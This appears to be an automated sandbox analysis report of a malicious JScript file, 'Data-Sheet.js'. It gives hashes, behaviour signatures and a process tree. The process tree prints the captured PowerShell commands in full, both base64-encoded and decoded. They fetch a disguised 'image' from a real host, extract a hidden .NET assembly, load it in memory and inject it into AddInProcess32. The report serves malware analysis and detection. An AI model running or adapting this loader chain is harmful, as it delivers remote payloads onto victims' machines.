Analysis

  • max time kernel
    119s
  • max time network
    124s
  • platform
    windows7_x64
  • resource
    win7-20240419-en
  • resource tags

    arch:x64arch:x86image:win7-20240419-enlocale:en-usos:windows7-x64system
  • submitted
    18-06-2024 09:35

General

  • Target

    Data-Sheet.js

  • Size

    32KB

  • MD5

    f83ca689e03194dae68a7c1c6dfcfaf4

  • SHA1

    6dff0eb5bcbdde1450eee59363abfeb32996f0e9

  • SHA256

    8ab47db42a777fa45a2eded252d0d3001a67efcff1cb9cc34b4d92d17800a020

  • SHA512

    0f0aad4873fa57a8770a70e3aceeb354fa68a599139cd36a9aa41d778f71e2ec2053cb71065923b6266b4d4fdd6c00f0cd2b1217ba541b4078627f77899ab019

  • SSDEEP

    384:/4bHOGs/AkVLg/U+/X/69tP5gHxSqU8HheWps/CsSI:/4b5s/AkVU/T/X/69tPuRSqFBeWpVsSI

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\Data-Sheet.js
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:2164
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = 'ZnVuY3Rpb24gRG93bmxvYWREYXRhRnJvbUxpbmtzIHsgcGFyYW0gKFtzdHJpbmdbXV0kbGlua3MpICR3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyAkZG93bmxvYWRlZERhdGEgPSBAKCk7ICRzaHVmZmxlZExpbmtzID0gJGxpbmtzIHwgR2V0LVJhbmRvbSAtQ291bnQgJGxpbmtzLkxlbmd0aDsgZm9yZWFjaCAoJGxpbmsgaW4gJHNodWZmbGVkTGlua3MpIHsgdHJ5IHsgJGRvd25sb2FkZWREYXRhICs9ICR3ZWJDbGllbnQuRG93bmxvYWREYXRhKCRsaW5rKSB9IGNhdGNoIHsgY29udGludWUgfSB9OyByZXR1cm4gJGRvd25sb2FkZWREYXRhIH07ICRsaW5rcyA9IEAoJ2h0dHBzOi8vdXBsb2FkZGVpbWFnZW5zLmNvbS5ici9pbWFnZXMvMDA0Lzc5OC8wMTUvb3JpZ2luYWwvbmV3X2ltYWdlLmpwZz8xNzE4Mjg0MjE2JywgJ2h0dHBzOi8vdXBsb2FkZGVpbWFnZW5zLmNvbS5ici9pbWFnZXMvMDA0Lzc5OC8wMTUvb3JpZ2luYWwvbmV3X2ltYWdlLmpwZz8xNzE4Mjg0MjE2Jyk7ICRpbWFnZUJ5dGVzID0gRG93bmxvYWREYXRhRnJvbUxpbmtzICRsaW5rczsgaWYgKCRpbWFnZUJ5dGVzIC1uZSAkbnVsbCkgeyAkaW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoJGltYWdlQnl0ZXMpOyAkc3RhcnRGbGFnID0gJzw8QkFTRTY0X1NUQVJUPj4nOyAkZW5kRmxhZyA9ICc8PEJBU0U2NF9FTkQ+Pic7ICRzdGFydEluZGV4ID0gJGltYWdlVGV4dC5JbmRleE9mKCRzdGFydEZsYWcpOyAkZW5kSW5kZXggPSAkaW1hZ2VUZXh0LkluZGV4T2YoJGVuZEZsYWcpOyBpZiAoJHN0YXJ0SW5kZXggLWdlIDAgLWFuZCAkZW5kSW5kZXggLWd0ICRzdGFydEluZGV4KSB7ICRzdGFydEluZGV4ICs9ICRzdGFydEZsYWcuTGVuZ3RoOyAkYmFzZTY0TGVuZ3RoID0gJGVuZEluZGV4IC0gJHN0YXJ0SW5kZXg7ICRiYXNlNjRDb21tYW5kID0gJGltYWdlVGV4dC5TdWJzdHJpbmcoJHN0YXJ0SW5kZXgsICRiYXNlNjRMZW5ndGgpOyAkY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkYmFzZTY0Q29tbWFuZCk7ICRsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJGNvbW1hbmRCeXRlcyk7ICR0eXBlID0gJGxvYWRlZEFzc2VtYmx5LkdldFR5cGUoJ1J1blBFLkhvbWUnKTsgJG1ldGhvZCA9ICR0eXBlLkdldE1ldGhvZCgnVkFJJykuSW52b2tlKCRudWxsLCBbb2JqZWN0W11dICgndHh0LmN0LzE5LjMwMS44Ny43NDEvLzpwdHRoJyAsICdkZXNhdGl2YWRvJyAsICdkZXNhdGl2YWRvJyAsICdkZXNhdGl2YWRvJywnQWRkSW5Qcm9jZXNzMzInLCdkZXNhdGl2YWRvJykpfX0=';$OWjuxd = (New-Object System.Text.UTF8Encoding).GetString([System.Convert]::FromBase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2756
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/798/015/original/new_image.jpg?1718284216', 'https://uploaddeimagens.com.br/images/004/798/015/original/new_image.jpg?1718284216'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('RunPE.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.ct/19.301.87.741//:ptth' , 'desativado' , 'desativado' , 'desativado','AddInProcess32','desativado'))}}"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2560

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

    Filesize

    7KB

    MD5

    03ebea57ff7399a6ce1c0eb8378f0039

    SHA1

    aa09de405cd3c73a7922f8fb1aee99e6c2fd5a8d

    SHA256

    166297f2d44cecbdd8b072ece67f73c4e6d9c407d6926528e95dbcf7e32c3c8f

    SHA512

    02c4a3699124c1d16db449efbe6e01b8205bb3417c035cde5d230c414eade9dbb8a64449ba63dca9ebaf2f9c680e7dc16a74fc9a5a4e5af789f663ada4587884

  • memory/2560-31-0x000000001AE30000-0x000000001B01E000-memory.dmp

    Filesize

    1.9MB

  • memory/2756-20-0x000007FEF5F2E000-0x000007FEF5F2F000-memory.dmp

    Filesize

    4KB

  • memory/2756-21-0x000000001B620000-0x000000001B902000-memory.dmp

    Filesize

    2.9MB

  • memory/2756-22-0x0000000002860000-0x0000000002868000-memory.dmp

    Filesize

    32KB

  • memory/2756-23-0x000007FEF5C70000-0x000007FEF660D000-memory.dmp

    Filesize

    9.6MB

  • memory/2756-24-0x000007FEF5C70000-0x000007FEF660D000-memory.dmp

    Filesize

    9.6MB

  • memory/2756-30-0x000007FEF5C70000-0x000007FEF660D000-memory.dmp

    Filesize

    9.6MB

  • memory/2756-32-0x000007FEF5C70000-0x000007FEF660D000-memory.dmp

    Filesize

    9.6MB